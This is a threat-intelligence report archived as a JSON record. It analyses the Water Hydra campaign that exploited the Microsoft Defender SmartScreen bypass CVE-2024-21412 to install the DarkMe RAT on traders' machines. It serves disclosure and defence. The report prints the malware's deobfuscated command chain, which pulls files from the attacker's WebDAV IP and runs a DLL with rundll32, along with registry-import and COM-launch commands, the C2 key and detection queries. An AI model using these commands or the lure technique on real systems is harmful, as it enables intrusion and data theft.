{ "id": "4eeca7a3-1f59-4235-90a6-0afea27228a0", "created_at": "2026-04-06T00:08:09.072442Z", "updated_at": "2026-04-10T13:12:29.392134Z", "deleted_at": null, "sha1_hash": "b48c071ae18a9bef5ea4d462d70436137953a20a", "title": "CVE-2024-21412: Water Hydra Targets Traders with Microsoft Defender SmartScreen Zero-Day", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2438499, "plain_text": "CVE-2024-21412: Water Hydra Targets Traders with Microsoft\r\nDefender SmartScreen Zero-Day\r\nBy Peter Girnus, Aliakbar Zahravi, Simon Zuckerbraun ( words)\r\nPublished: 2024-02-13 · Archived: 2026-04-05 23:51:14 UTC\r\nThe Trend Micro Zero Day Initiativeopen on a new tab discovered the vulnerability CVE-2024-21412 which we\r\ntrack as ZDI-CAN-23100, and alerted Microsoft of a Microsoft Defender SmartScreen bypass used as part of a\r\nsophisticated zero-day attack chain by the  advanced persistent threat (APT) group we track as Water Hydra (aka\r\nDarkCasino) that targeted financial market traders.\r\nIn late December 2023, we began tracking a campaign by the Water Hydra group that contained similar tools, tactics,\r\nand procedures (TTPs) that involved abusing internet shortcuts (.URL) and Web-based Distributed Authoring and\r\nVersioning (WebDAV) components. In this attack chain, the threat actor leveraged CVE-2024-21412 to bypass\r\nMicrosoft Defender SmartScreen and infect victims with the DarkMe malware. In cooperation with Microsoft, the\r\nZDI bug bounty program worked to disclose this zero-day attack and ensure a rapid patchopen on a new tab for this\r\nvulnerability. Trend also provides protectionopen on a new tab to users from threat actors that exploit CVE-2024-\r\n21412 via the security solutions that can be found at end of this blog entry.\r\nAbout the Water Hydra APT group\r\nThe Water Hydra group was first detected in 2021, when it gained notoriety for targeting the financial industry,\r\nlaunching attacks against banks, cryptocurrency platforms, forex and stock trading platforms, gambling sites, and\r\ncasinos worldwide.\r\nInitially, the group’s attacks were attributed to the Evilnum APT group due to similar phishing techniques and other\r\nTTPs. In September 2022, researchers at NSFOCUSopen on a new tab found the VisualBasic remote access tool\r\n(RAT) called DarkMe as part of a campaign named DarkCasino, which targeted European traders and gambling\r\nplatforms.\r\nBy November 2023, after several successive campaigns, including one that used the well-known WinRAR code\r\nexecution vulnerabilityopen on a new tab CVE-2023-38831open on a new tab in the attack chain to target stock\r\ntraders, it became evident that Water Hydra was its own APT group distinct from Evilnum.\r\nWater Hydra’s attack patterns show significant levels of technical skill and sophistication, including the ability to use\r\nundisclosed zero-day vulnerabilities in attack chains. For example, the Water Hydra group exploited the\r\naforementioned CVE-2023-38831 as a zero-day to target cryptocurrency traders in April 2023 — months before\r\ndisclosure. Since its disclosure, CVE-2023-38831 has also been exploited by other APT groups such as APT28\r\n(FROZENLAKE), APT29 (Cozy Bear), APT40, Dark Pink, Ghostwriter, Konni, and Sandworm.\r\nWater Hydra attack chain and TTPs\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 1 of 19\n\nThroughout our investigation, we observed the Water Hydra APT group updating and testing new deployments of\r\ntheir attack chain.\r\nFigure 1 shows the original infection chain exploiting CVE-2024-21412. Since late January 2024, Water Hydra has\r\nbeen using a streamlined infection process.\r\nIn January 2024, Water Hydra updated its infection chain exploiting CVE-2024-21412 to execute a malicious\r\nMicrosoft Installer File (.MSI), streamlining the DarkMe infection process.\r\nInfection chain analysis\r\nIn this section, we will analyze the full Water Hydra campaign exploiting CVE-2024-21412 to bypass Microsoft\r\nDefender SmartScreen to infect users with DarkMe malware.\r\nIn the attack chain, Water Hydra deployed a spearphishing campaign (T1566.002open on a new tab) on forex trading\r\nforums and stock trading Telegram channels to lure potential traders into infecting themselves with DarkMe malware\r\nusing various social engineering techniques, such as posting messages asking for or providing trading advice, sharing\r\nfake stock and financial tools revolving around graph technical analysis, graph indicator tools, all of which were\r\naccompanied by a URL pointing to a trojan horse stock chart served from a compromised Russian trading and\r\ncryptocurrency information site (fxbulls[.]ru).\r\nIt’s interesting to note that this compromised WordPress site shares the same name as an actual forex broker,\r\nfxbulls[.]com, but is hosted on a Russian (.ru) domain.\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 2 of 19\n\nThe fxbulls[.]com broker uses the MetaTrader 4 (MT4) trading platform, which was removed from the Apple App\r\nStore in September 2022 due to Western sanctions against Russia. However, Apple reinstated both MT4 and another\r\nMetaTrader version (MT5) by March 2023.\r\nDuring our analysis of the spearphishing campaign on the forex trading forums, we uncovered a considerable number\r\nof posts by Water Hydra in both the English and Russian languages. Often, these posts would reply to general forex\r\nor stock trading questions regarding the technical analysis of trading charts and included a link to a stock chart as a\r\nlure.\r\nHowever, instead of the expected stock chart, these posts linked back to an HTM/HTML landing page hosted on a\r\ncompromised Russian language forex, stock, and cryptocurrency news site hosted on WordPress with a landing page\r\nshowing a second malicious link. This lure, disguised as a link to a JPEG file, points to a WebDAV share. Many of\r\nthe accounts we uncovered posting links to the malicious fxbulls[.]ru site were years old, indicating that DarkMe\r\nmay have compromised legitimate user accounts on trading forums as part of its campaign.\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 3 of 19\n\nThe landing page on fxbulls[.]ru contains a link to a malicious WebDAV share with a filtered crafted view. When\r\nusers click on this link, the browser will ask them to open the link in Windows Explorer. This is not a security\r\nprompt, so the user might not think that this link is malicious.\r\nFigure 6 shows the JPEG trojan horse linking back to a WebDAV share using Windows Advanced Query Syntax\r\n(AQS).\r\nAs the Water Hydra campaign progressed, we noticed a shift to an additional lure in the form of a PDF file. These\r\ninternet shortcuts disguised as PDF files have the same functionality as the JPEG lure that bootstraps the infection\r\nprocess. These PDF lures are also served from the compromised fxbulls[.]ru domain. These PDF lures can be\r\ndelivered via phishing emails in the form of fake financial contracts.\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 4 of 19\n\nIn this campaign, Water Hydra employs an interesting technique to lure victims into clicking a malicious Internet\r\nShortcut (.url) file. This TTP abuses the Microsoft Windows search: Application Protocol, which is distinct from the\r\nmore common ms-search protocol. The search: protocol, which has been a part of Windows since Vista, invokes the\r\nWindows desktop search application. During the infection chain, Water Hydra uses the search: protocol with\r\ncrafted Advanced Query Syntax (AQS) queries to customize the appearance of the Windows Explorer view in order\r\nto trick victims.\r\nFigure 8 shows the HTML containing the malicious search: URL. Note the following characteristics of the URL:\r\n       It uses the search: application protocol searchopen on a new tab to perform a search for photo_2023-12-\r\n29.jpg.\r\n       It uses the crumbopen on a new tab parameter to constrain the scope of the search to the malicious\r\nWebDAV share.\r\n       It uses the DisplayNameopen on a new tab element to deceive users into thinking that this is the local\r\nDownloads folder.\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 5 of 19\n\nAfter clicking the link shown in Figure 8, we can see how the Windows Explorer view is presented to the victim\r\n(Figure 8). By using a combination of search protocols, AQS queries, and the DisplayName element, the Water\r\nHydra operators can trick users into believing that the file from the malicious WebDAV server has been downloaded,\r\ntricking them into clicking this malicious file (a fake JPEG image). This Explorer window is a carefully crafted view\r\nof a malicious .url fileopen on a new tab named photo_2023-12-29.jpg.url. Microsoft Windows automatically hides\r\nthe .url extension, making it appear from the filename that the file is a JPEG image.\r\nCVE-2024-21412 revolves around internet shortcuts. These .url files are simple INI configuration files that take a\r\n“URL=” parameter pointing to a URL. While the .url file formatopen on a new tab is not officially documented, the\r\nURL parameter is the only one required for this file type.\r\nDuring our analysis of this malicious .url file, we also noticed that Water Hydra used the imagress.dll (Windows\r\nImage Resource) icon library to change the default internet shortcut file to the image icon using the IconFile= and\r\nIconIndex= parameters to further deceive users and add legitimacy to the trojan horse internet shortcut. Through a\r\nsimple double-click of this internet shortcut disguised as a JPEG, the Water Hydra operators can bypass Microsoft\r\nDefender SmartScreen by exploiting CVE-2024-21412 and fully compromise the Windows host.\r\nWhile analyzing the CVE-2024-21412-infected internet shortcut file, we noticed something unusual. The URL=\r\nparameter of the photo_2023-12-29.jpg.url file pointed to another internet shortcut file hosted on a server with a\r\ndotted quad address (IPv4).\r\nDuring our analysis of the malicious WebDAV share, we were able to obtain all the Water Hydra artifacts, including\r\nthe referenced 2.url internet shortcut. Following this reference trail, we discovered that the 2.url contained the logic\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 6 of 19\n\nto exploit the previously patched Microsoft Defender SmartScreen bypass identified as CVE-2023-36025open on a\r\nnew tab. During our recent research, we delved into a campaign targeting this CVE.\r\nIt’s highly unusual to reference an internet shortcut within another internet shortcut. Because of this anomalous\r\nbehavior, we created a proof-of-concept (PoC) to perform further testing and analysis. During this PoC testing, ZDI\r\ndiscovered that the initial shortcut (which referenced the second shortcut) managed to bypass the patch that\r\naddressed CVE-2023-36025, evading SmartScreen protections. Through the analysis and testing of an internal PoC,\r\nwe concluded that calling a shortcut within another shortcut was sufficient to evade SmartScreen, which failed to\r\nproperly apply Mark-of-the-Web (MotW), a critical Windows component that alerts users when opening or running\r\nfiles from an untrusted source. After our analysis, we contacted Microsoft MSRC to alert them about an active\r\nSmartScreen zero-day being exploited in the wild and provided them with our proof-of-concept exploit.\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 7 of 19\n\nBy crafting the Windows Explorer view, Water Hydra is able to entice victims into clicking on an exploit for CVE-2024-21412, which in turn executes code from an untrusted source, relying on Windows being unable to apply MotW\r\ncorrectly and resulting in a lack of SmartScreen protections. The infection chain simply runs in the background and\r\nthe infected user has no knowledge of this.\r\nAfter bypassing SmartScreen, the second 2.url shortcut runs a batch file embedded in a ZIP file from the attacker's\r\nWebDAV share. This batch script copies and executes a DarkMe dynamic-link library (DLL) loader from the\r\nmalicious WebDAV share. It’s alarming that this entire sequence runs without the user's knowledge and SmartScreen\r\nprotections. The end user is given little to no indication that anything is afoot.\r\nIn Figure 14, Sysinternals Process Explorer displays the malicious batch file's execution. This batch file is the first\r\nscript to be ran after the exploitation of CVE-2024-21412 results in the bypassing of SmartScreen protections.\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 8 of 19\n\nThe screenshot in Figure 15 shows the numerous requests made to the Water Hydra WebDAV share. In WebDAV we\r\ncan observe several Property Find (PROPFIND) requests to retrieve XML-stored properties from the WebDAV\r\nserver.\r\nOnce the exploitation and infection chains are complete, the threat actor connects to its C\u0026C WebDAV server to\r\ndownload a real JPEG file, which has the same name as the Trojan horse JPEG that was used to exploit CVE-2024-\r\n21412. This file is then displayed to the victim, who is deceived into thinking that they have opened the JPEG file\r\nthey originally intended to view from their Downloads folder (without any knowledge about the DarkMe infection).\r\nAnalysis of the DarkMe downloader\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 9 of 19\n\nFile name b3.dll\r\nMD5 409e7028f820e6854e7197cbb2c45d06\r\nSHA-1 d41c5a3c7a96e7a542a71b8cc537b4a5b7b0cae7\r\nSHA-256 bf9c3218f5929dfeccbbdc0ef421282921d6cbc06f270209b9868fc73a080b8c\r\nCompiler Win32 Executable Microsoft Visual Basic 6 [Native]\r\nOriginal\r\nname\r\nundersets.dll\r\nFile type Win32 DLL\r\nTLSH T18F856B9611E3EFACCAA049B8599FA01184A2CD3580355D73A191CE1BFB3AE13F4177B7\r\nCompilation\r\ndate\r\n2024-01-04\r\nTable 1. Properties of the DarkMe downloader (b3.dll)\r\nThe DarkMe downloader is a DLL, written in Visual Basic, that is responsible for downloading and executing the\r\nnext stage payload from the attacker's WebDAV. The malware carries out its actions by running a series of commands\r\nthrough the cmd.exe command interpreter. Within the malware, these commands are scrambled using a reverse string\r\ntechnique. To execute the commands, it first reconstructs them by employing the Strings.StrReverse method to\r\nreverse the string order back to normal, after which it executes them via the shell method. It’s important to note that\r\nthe malware is loaded with junk code to disguise its true purpose and to complicate reverse engineering. For the sake\r\nof research and easier understanding, all the code snippets in this blog entry are presented in a deobfuscated, cleaner\r\nform.\r\nThe following snippet illustrates how the malware performs the above operations:\r\nThe deobfuscated command line is as follows:\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 10 of 19\n\ncmd /c copy /b \\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures\\7z[.]dll %TEMP%\\7z[.]dll\u0026\u0026cmd /c copy /b\r\n\\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures\\7z[.]exe %TEMP%\\7z[.]exe\u0026\u0026cmd /c\r\n\\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures\\photo_2023-12-29s[.]jpg\u0026\u0026cmd /c copy /b\r\n\\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures\\My2[.]zip %TEMP%\\My2[.]zip\u0026\u0026timeout 1\u0026\u0026cmd /c cd\r\n%TEMP%\u0026\u00267z x \"My2[.]zip\" -password-1 -y\u0026\u0026timeout 1\u0026\u0026cmd /c rundll32 undersets[.]dll,\r\nRunDllEntryPointW\u0026\u0026timeout 1\u0026\u0026pause\r\nThe following table shows the executed commands and an explanation of what they do:\r\n \r\nCommand Details\r\ncmd /c copy /b\r\n\\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures\\7z[.]dll\r\n%TEMP%\\7z[.]dll\u0026\u0026cmd /c copy /b\r\n\\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures\\7z[.]exe\r\nCopies 7z.dll and 7Z.exe from a WebDAV share\r\nlocated at \\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures\r\nto the local temporary folder %TEMP% of an\r\ninfected system\r\ncmd /c\r\n\\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures\\photo_2023-12-\r\n29s[.]jpg\r\nOpens and displays a decoy stock graph\r\nphoto_22023-12-29s.jpg\r\ncmd /c copy /b\r\n\\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures\\My2[.]zip\r\n%TEMP%\\My2[.]zip\r\nCopies My2.zip from a WebDAV share located at\r\n\\\\84[.]32[.]189[.]74@80\\fxbulls\\pictures to the\r\nlocal temporary folder %TEMP% of an infected\r\nsystem\r\ntimeout 1 Pauses the script for 1 second\r\ncmd /c cd %TEMP%\r\nChanges the current directory to the local\r\ntemporary folder\r\n7z x \"My2[.]zip\" -password-1 -y\r\nUses the 7z (7-Zip) command-line tool to extract\r\nMy22[.]zip using the password “assword-1” — the\r\n-y flag automatically answers “yes” to all prompts,\r\nsuch as prompts to overwrite files\r\ntimeout 1 Pauses the script for another second\r\ncmd /c rundll32 undersets[.]dll, RunDllEntryPointW\r\nExecutes a DLL file (undersets[.]dll) using\r\nrundll32, a legitimate Windows command.\r\nRunDllEntryPointW is likely the entry point for the\r\nDLL. This is a common technique during malware\r\ninfections designed to execute code within the\r\ncontext of a legitimate process.\r\ntimeout 1 Pauses the script for yet another second\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 11 of 19\n\nPause\r\nWaits for the user to press a key before continuing\r\nor terminating the process; it is often used for\r\ndebugging or to keep a command window open\r\nTable 2. The commands executed by the script\r\nAs shown in the final steps of the script, the malware executes the RunDllEntryPointW export function from a DLL\r\nnamed undersets.dll via rundll32.\r\nThe following image shows the contents of My2.zip:\r\nAnalysis of the DarkMe Loader\r\n \r\nFile Name undersets.dll\r\nMD5 409e7028f820e6854e7197cbb2c45d06\r\nSHA-1 d41c5a3c7a96e7a542a71b8cc537b4a5b7b0cae7\r\nSHA-256 bf9c3218f5929dfeccbbdc0ef421282921d6cbc06f270209b9868fc73a080b8c\r\nCompiler Win32 Executable Microsoft Visual Basic 6 [Native]\r\nOriginal\r\nname\r\nundersets.dll\r\nFile type Win32 DLL\r\nTLSH T18F856B9611E3EFACCAA049B8599FA01184A2CD3580355D73A191CE1BFB3AE13F4177B7\r\nCompilation\r\ndate\r\n2024-01-04\r\nTable 3. Properties of the DarkMe loader (undersets.dll)\r\nUpon execution, the malware builds a DarkMe payload by merging the contents of two binary files — a1 and a2 —\r\ninto a single new file, C:\\Users\\admin\\AppData\\Roaming\\OnlineProjects\\OnlineProject.dll.\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 12 of 19\n\nTo avoid exposing important strings directly within the binary, the malware encodes them in hexadecimal format. It\r\nsubsequently decodes these into their ASCII representations during execution as necessary.\r\nTo simplify research and enhance readability, all the junk code has been removed and hex-encoded data converted to\r\nASCII format.\r\nThe malware constructs and executes the following command that leverages the reg.exe utility to import registry\r\nsettings from the kb.txt file:\r\n\"C:\\Windows\\System32\\cmd.exe\" /c cd C:\\Users\\admin\\AppData\\Roaming\\OnlineProjects\u0026\u0026cmd /c timeout\r\n1\u0026\u0026cmd /c reg.exe import kb.txt\r\nThese settings are related to registering DarkMe payload OnlineProject.dll as a COM server and setting up its\r\nconfiguration in the system's registry.\r\nThe following snippet shows the kb.txt registry file content:\r\nFinally, to run the payload, the loader executes the following command to invoke the registered COM class:\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 13 of 19\n\n\"C:\\Windows\\SysWOW64\\rundll32.exe\" /sta {74A94F46-4FC5-4426-857B-FCE9D9286279}\r\nAnalysis of the DarkMe RAT\r\n \r\nFIle Name OnlineProject.dll\r\nMD5 93daa51c8af300f9948fe5fd51be3bfb\r\nSHA-1 a2ba225442d7d25b597cb882bb400a3f9722a5d4\r\nSHA-256 d123d92346868aab77ac0fe4f7a1293ebb48cf5af1b01f85ffe7497af5b30738\r\nCompiler Win32 Executable Microsoft Visual Basic 6 [Native]\r\nOriginal name buogaw1.ocx\r\nFile type Win32 DLL\r\nTLSH T1bb37ee6ef390e371a4468862785893d570ecb2bf4049a825fb12cb197bd5cfbe1a1713\r\nCompilation date 2024-01-04\r\nTable 4. Properties of the DarkMe RAT (OnlineProject.dll)\r\nThe final delivery of this attack is a RAT known as DarkMe. Like the loader and downloader modules, this malware\r\nis a DLL file and written in Visual Basic. However, this final module has a higher amount of obfuscation and junk\r\ncode compared to the previous two. The malware communicates with its C\u0026C server using a custom protocol over\r\nTCP.\r\nUpon execution, the malware gathers information from the infected system, including the computer name, username,\r\ninstalled antivirus software, and the title of the active window. It then registers itself with the attacker's C\u0026C server.\r\nTo establish network communication and handle socket messages, the malware creates a hidden window named\r\nSOCKET_WINDOW with STATIC type using the CreateWindowEx Windows API. This hidden window facilitates\r\ncommunication with the server by channeling socket data through window messages.\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 14 of 19\n\nThe C\u0026C domain is encrypted using RC4 and stored in a VB.Form TextBox named Text2022. The malware decrypts\r\nit using a hardcoded key, \"noway123!$$#@35@!\".\r\nThe malware then registers the victim’s system with its C\u0026C server by gathering information such as the computer\r\nname, username, installed antivirus software, and the title of the active window.\r\nThe following is an example of the initial network traffic the malware sends to register victims:\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 15 of 19\n\nThe following is the initial packet structure used by DarkMe:\r\n \r\nPacket Details\r\n92 Hardcoded magic value for data exfiltration\r\n0xA9 xA9 0xA9 Delimiter\r\nUS Abbreviated country name retrieved via GetLocaleInfo API with LCType\r\nUnited States\r\nName of country retrieved via GetLocaleInfo API with LCType\r\nLOCALE_SENGLISHCOUNTRYNAME\r\n0xA9 Delimiter\r\nDESKTOP-BFTPUHP/admin\r\nComputer Name/Username\r\n0xA9 Delimiter\r\n(Microsoft Defender)\r\nRetrieved list of installed antivirus software by utilizing the Windows Management\r\nInstrumentation (WMI) service. If there are no antivirus products installed, the\r\nmalware will use a default value (“No Antivirus”).\r\n0xA9 Delimiter\r\n123 Fixed hardcoded value (Retrieved from the VB.TextBox Text10aa Text value)\r\n0xA9 Delimiter\r\nMicrosoft Office\r\nClick-to-Run (SxS)\r\nForeground Window Title: If no window is open, the malware selects the hidden\r\nwindow title value Microsoft Office Click-to-Run (SxS) from the Darkme VB.Form\r\n0xA9 Delimiter\r\nTable 5. Initial packet structure used by DarkMe\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 16 of 19\n\nTo check the connection with the C\u0026C server, the malware periodically sends a heartbeat packet. The malware sets\r\nup a separate timer called Timer3 with an interval of “5555 milliseconds” for this task. Figure 26 shows an example\r\nof this traffic (some variants of DarkMe send a different value):\r\nOnce the malware registers its victim, it then initiates a listener for incoming TCP connections, waiting to receive\r\ncommands from the attacker. Once a command is received, the malware parses and executes it on the infected\r\nsystem. The malware supports a wide range of functionalities. The supported commands would allow malware to\r\nEnumerate directory content (STRFLS, STRFL2), execute shell commands (SHLEXE), create and delete directories,\r\nretrieve system drive information (300100), and generate a ZIP file from given path (ZIPALO), among others.\r\nConclusion\r\nZero-day attacks represent a significant security risk to organizations, as these attacks exploit vulnerabilities that are\r\nunknown to software vendors and have no corresponding security patches. APT groups such as Water Hydra possess\r\nthe technical knowledge and tools to discover and exploit zero-day vulnerabilities in advanced campaigns, deploying\r\nhighly destructive malware such as DarkMe.\r\nIn a previous campaign, Water Hydra exploited CVE-2023-38831 months before organizations could defend\r\nthemselves. After disclosure, CVE-2023-38831 was subsequently deployed in other campaigns by other APT groups.\r\nZDI has noticed several alarming trends in zero-day abuse. First, there exists a trend where zero-days found by\r\ncybercrime groups make their way into attack chains deployed by nation-state APT groups such as APT28\r\n(FROZENLAKE), APT29 (Cozy Bear), APT40, Dark Pink, Ghostwriter, Konni, Sandworm and more. These groups\r\nemploy these exploits to launch sophisticated attacks, thereby exacerbating risks to organizations. Second, the simple\r\nbypass of CVE-2023-36025 by CVE-2024-21412 highlights a broader industry trend when it comes to security\r\npatches that show how APT threat actors can easily circumvent narrow patches by identifying new vectors of attack\r\naround a patched software component.\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 17 of 19\n\nTo make software more secure and protect customers from zero-day attacks, the Trend Zero Day Initiativeopen on a\r\nnew tab works with security researchers and vendors to patch and responsibly disclose software vulnerabilities before\r\nAPT groups can deploy them in attacks. The ZDI Threat Hunting team also proactively hunts for zero-day attacks in\r\nthe wild to safeguard the industry.\r\nOrganizations can protect themselves from these kinds of attacks with Trend Vision One™️products, which enables\r\nsecurity teams to continuously identify attack surfaces, including known, unknown, managed, and unmanaged cyber\r\nassets. Vision One helps organizations prioritize and address potential risks, including vulnerabilities. It considers\r\ncritical factors such as the likelihood and impact of potential attacks and offers a range of prevention, detection, and\r\nresponse capabilities. This is all backed by advanced threat research, intelligence, and AI, which helps reduce the\r\ntime taken to detect, respond, and remediate issues. Ultimately, Vision One can help improve the overall security\r\nposture and effectiveness of an organization, including against zero-day attacks.\r\nWhen faced with uncertain intrusions, behaviors, and routines, organizations should assume that their system is\r\nalready compromised or breached and work to immediately isolate affected data or toolchains. With a broader\r\nperspective and rapid response, organizations can address breaches and protect its remaining systems, especially with\r\ntechnologies such as  Trend Micro Endpoint Securityproducts and Trend Micro Network Securityproducts, as well\r\nas comprehensive security solutions such as Trend Micro™ Security Operationsproducts, which can detect, scan, and\r\nblock malicious content across the modern threat landscape.\r\nEpilogue\r\nDuring our investigation into CVE-2024-21412 and Water Hydra we began tracking additional threat actor activity\r\naround this zero-day. In particular, the DarkGate malware operators began incorporating this exploit into their\r\ninfection chains. We will be providing additional information and analysis on threat actors that have exploited CVE-2024-21412 in a future blog entry. Trend Micro customers are protected from these additional campaigns via virtual\r\npatches for ZDI-CAN-23100.\r\nTrend Protections\r\nThe following protections exist to detect and protect Trend customers against the zero-day CVE-2024-21412 (ZDI-CAN-23100) and the DarkMe Malware Payload.\r\nPotential Exploitation of Microsoft SmartScreen Detected (ZDI-CAN-23100)\r\nExploitation of Microsoft SmartScreen Detected (CVE-2024-21412)\r\nSuspicious Activities Over WebDav\r\n(productCode:sds OR productCode:pds OR productCode:xes OR productCode:sao) AND eventId:1 AND\r\neventSubId:2 AND objectCmd:\"rundll32.exe\" AND objectCmd:/fxbulls/ AND ( objectCmd:.url OR\r\nobjectCmd:.cmd)\r\n(productCode:sds OR productCode:pds OR productCode:xes OR productCode:sao) AND eventId:1 AND\r\neventSubId:2 AND objectCmd:\"rundll32.exe\" AND objectCmd:/underwall/ AND ( objectCmd:.url OR\r\nobjectCmd:.cmd)\r\neventId:\"100101\" AND (request:\"*84.32.189.74*\" OR request:\"87iavv.com\")\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 18 of 19\n\neventId:3 AND (src:\"84.32.189.74*\" OR dst:\"84.32.189.74*\")\r\nproductCode:(pdi OR xns OR pds OR sds OR stp OR ptp OR xcs) AND (eventId:(100115 OR 100119) OR\r\neventName:INTRUSION_DETECTION) AND (src:\"84.32.189.74*\" OR dst:\"84.32.189.74*\")\r\n43700 - HTTP: Microsoft Windows Internet Shortcut SmartScreen Bypass Vulnerability\r\n43701 - ZDI-CAN-23100: Zero Day Initiative Vulnerability (Microsoft Windows SmartScreen)\r\n43266 - TCP: Backdoor.Win32.DarkMe.A Runtime Detection\r\n4983: CVE-2024-21412 - Microsoft Windows SmartScreen Exploit - HTTP(Response)\r\n1011949 - Microsoft Windows Internet Shortcut SmartScreen Bypass Vulnerability (CVE-2024-21412) \r\n1011950 - Microsoft Windows Internet Shortcut SmartScreen Bypass Vulnerability Over SMB (CVE-2024-\r\n21412)\r\n1011119 - Disallow Download Of Restricted File Formats (ATT\u0026CK T1105)\r\n1004294 - Identified Microsoft Windows Shortcut File Over WebDav\r\n1005269 - Identified Download Of DLL File Over WebDav (ATT\u0026CK T1574.002)\r\n1006014 - Identified Microsoft BAT And CMD Files Over WebDav\r\nIndicators of Compromise\r\nThe indicators of compromise for this entry can be found here.\r\nAcknowledgments\r\nThe Zero Day Initiative would like to thank the following Trenders for their contributions in ensuring that Trend\r\nMicro customers were protected from this zero-day attack pre-patching:\r\nScott Graham, Mohamad Mokbel, Abdelrahman Esmail, Simon Dulude, Senthil Nathan Sankar, Amit Kumar, and a\r\nspecial thanks to the content writers and marketing teams for helping with this research.\r\nWe would like to thank the Microsoft Security Response Center (MSRC) team for their continued collaboration and\r\ntheir efforts in deploying a patch in a timely manner.\r\nSource: https://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nhttps://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\r\nPage 19 of 19\n\neventSubId:2 objectCmd:.cmd) AND objectCmd:\"rundll32.exe\" AND objectCmd:/underwall/ AND ( objectCmd:.url OR\neventId:\"100101\" AND (request:\"*84.32.189.74*\" OR request:\"87iavv.com\")\n Page 18 of 19", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html" ], "report_names": [ "cve202421412-water-hydra-targets-traders-with-windows-defender-s.html" ], "threat_actors": [ { "id": "059b16f8-d4e0-4399-9add-18101a2fd298", "created_at": "2022-10-25T15:50:23.29434Z", "updated_at": "2026-04-10T02:00:05.380938Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "Evilnum" ], "source_name": "MITRE:Evilnum", "tools": [ "More_eggs", "EVILNUM", "LaZagne" ], "source_id": "MITRE", "reports": null }, { "id": "0bc63952-5795-4fc7-85c1-50a7f207f2f0", "created_at": "2023-11-14T02:00:07.095723Z", "updated_at": "2026-04-10T02:00:03.450401Z", "deleted_at": null, "main_name": "DarkCasino", "aliases": [], "source_name": "MISPGALAXY:DarkCasino", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "aa65d2c9-a9d7-4bf9-9d56-c8de16eee5f4", "created_at": "2025-08-07T02:03:25.096857Z", "updated_at": "2026-04-10T02:00:03.659118Z", "deleted_at": null, "main_name": "NICKEL JUNIPER", "aliases": [ "Konni", "OSMIUM ", "Opal Sleet " ], "source_name": "Secureworks:NICKEL JUNIPER", "tools": [ "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "fd4c3ddd-11cc-4192-9c94-ff107d7f8492", "created_at": "2023-02-18T02:04:24.06294Z", "updated_at": "2026-04-10T02:00:04.644528Z", "deleted_at": null, "main_name": "Dark Pink", "aliases": [ "Saaiwc Group" ], "source_name": "ETDA:Dark Pink", "tools": [ "Ctealer", "Cucky", "KamiKakaBot", "LOLBAS", "LOLBins", "Living off the Land", "PowerSploit", "TelePowerBot", "ZMsg" ], "source_id": "ETDA", "reports": null }, { "id": "a5bd315b-6220-441f-8ed1-39e194dcd0e3", "created_at": "2023-12-01T02:02:33.667762Z", "updated_at": "2026-04-10T02:00:04.641333Z", "deleted_at": null, "main_name": "DarkCasino", "aliases": [ "Water Hydra" ], "source_name": "ETDA:DarkCasino", "tools": [ "CloudEyE", "DarkMe", "GuLoader", "PikoloRAT", "vbdropper" ], "source_id": "ETDA", "reports": null }, { "id": "16f2436b-5f84-44e3-a306-f1f9e92f7bea", "created_at": "2023-01-06T13:46:38.745572Z", "updated_at": "2026-04-10T02:00:03.086207Z", "deleted_at": null, 